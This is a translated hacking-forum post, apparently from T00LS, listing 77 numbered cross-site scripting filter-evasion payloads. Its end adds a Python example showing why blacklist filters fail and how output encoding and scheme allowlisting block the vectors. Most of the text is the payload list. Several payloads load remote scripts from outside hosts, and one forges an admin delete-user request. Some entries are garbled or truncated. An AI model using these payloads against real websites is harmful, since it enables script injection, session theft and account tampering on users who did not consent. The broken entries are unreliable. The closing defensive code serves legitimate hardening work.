1. What is XSS?
XSS stands for Cross Site Scripting. XSS occurs when an unexpected script instruction, injected into an HTML document served by the target website, is executed while the target user's browser renders that document.
Common XSS attack methods
(1) Ordinary XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<IMG SRC=http://3w.org/XSS/xss.js/>
(3) IMG tag, no semicolons and no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (must have a semicolon)
<IMG SRC=javascript:alert("XSS")>
(6) Fix defective IMG tags
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav.. omitted.. S')>
(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav.. omitted.. S')>
(10) Hexadecimal encoding, also without semicolons (calculator)
<IMG SRC=java.. omitted..XSS')>
(11) Embedded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Multi-line embedded JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Getting around restricted characters (requires the same page)
<script>z='document.'</script><script>z=z+'write("'</script><script>z=z+'<script'</script><script>z=z+' src=ht'</script><script>z=z+'tp://ww'</script><script>z=z+'w.shell'</script><script>z=z+'.net/1.'</script><script>z=z+'js></sc'</script><script>z=z+'ript>")'</script><script>eval(z)</script>
12-7-1 T00LS-Powered by Discuz! Board
https://www.a.com/viewthread.php?action=printable&tid=15267 2/6
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2. The null character is basically of no use in China, because there is nowhere it can be applied.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open bracket
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and some other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle bracket
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping JavaScript escapes
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list-style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'>
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) Add extra characters after DIV background-image (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">
(49) STYLE attribute split expression
<IMG STYLE="xss:expression(alert('XSS'))">
(50) Anonymous STYLE (composition: opening angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: a Flash file containing the XSS can be embedded
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript in Flash to carry the XSS code
a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);
(57) XML namespace; the .HTC file must be on the same server as the page carrying the XSS
<HTML xmlns:xss><?import namespace="xss" implementation="http://3w.org/XSS/xss.htc"><xss:xss>XSS</xss:xss></HTML>
(58) If the JS is filtered, the JS code can be placed inside an image file and loaded from there
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded commands, can execute arbitrary commands
<IMG SRC="http://www.a.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Filter around symbols
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" "SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP decimal
<A HREF="http://3232235521">XSS</A>
(71) IP hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="http://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
(77) JavaScript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
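Nearly every vector above relies on one of two things: a script-capable URL scheme landing in a src/href/url() attribute, or tag and attribute characters reaching the page unencoded. As an added example (not from the original post), the Python below shows why a string blacklist misses several of the listed variants while context-aware output handling neutralises all of them; the sample strings are copied from the numbered items, and the function names are my own.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed samples, copied from the vectors numbered in this thread.
SAMPLES = [
    "<IMG SRC=JaVaScRiPt:alert('XSS')>",         # (4)  mixed case
    "<IMG SRC=\"jav\tascript:alert('XSS');\">",   # (11) tab inside the scheme
    "<IMG SRC=\"java\0script:alert('XSS')\">",    # (17) null byte inside the scheme
    "<IMG SRC='vbscript:msgbox(\"XSS\")'>",       # (40) a scheme not on the blacklist
    "<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>",   # (24) no closing tag
]

# Blacklist filter of the kind these vectors were written to defeat:
# delete the literal strings an attacker is expected to use.
BLACKLIST = re.compile(r"javascript:|<script\b.*?</script>", re.IGNORECASE | re.DOTALL)

def naive_filter(untrusted):
    return BLACKLIST.sub("", untrusted)

def still_dangerous(markup):
    """Normalise roughly the way a browser does (drop control characters and
    whitespace, ignore case) and look for a script-capable scheme or tag."""
    norm = re.sub(r"[\x00-\x20]", "", markup).lower()
    return any(t in norm for t in ("javascript:", "vbscript:", "<script"))

def survives_blacklist():
    """Indices of SAMPLES that are still dangerous after naive_filter."""
    return [i for i, s in enumerate(SAMPLES) if still_dangerous(naive_filter(s))]

# Hardened handling: decide by output context, not by a list of bad strings.
def encode_for_html_body(untrusted):
    """Untrusted text placed in element content: entity-encode every character
    with HTML meaning, so no tag or attribute can form however it is spelled."""
    return html.escape(untrusted, quote=True)

SAFE_SCHEMES = ("http", "https")
def safe_url_attribute(untrusted):
    """Untrusted value placed in a src/href attribute: strip the control
    characters browsers ignore, allow only http/https by parsed scheme (this
    also rejects the protocol-relative '//host' form of item 74), then encode."""
    cleaned = re.sub(r"[\x00-\x20]", "", untrusted)
    parts = urlsplit(cleaned)
    if parts.scheme.lower() not in SAFE_SCHEMES or not parts.netloc:
        return None
    return html.escape(cleaned, quote=True)

if __name__ == "__main__":
    print("blacklist still lets through samples:", survives_blacklist())  # [1, 2, 3, 4]
```

Only the mixed-case item (4) is caught by the blacklist; the whitespace, null-byte, alternate-scheme and unterminated-tag variants all pass through it unchanged, whereas the encoding and scheme-allowlist functions reject or neutralise every sample.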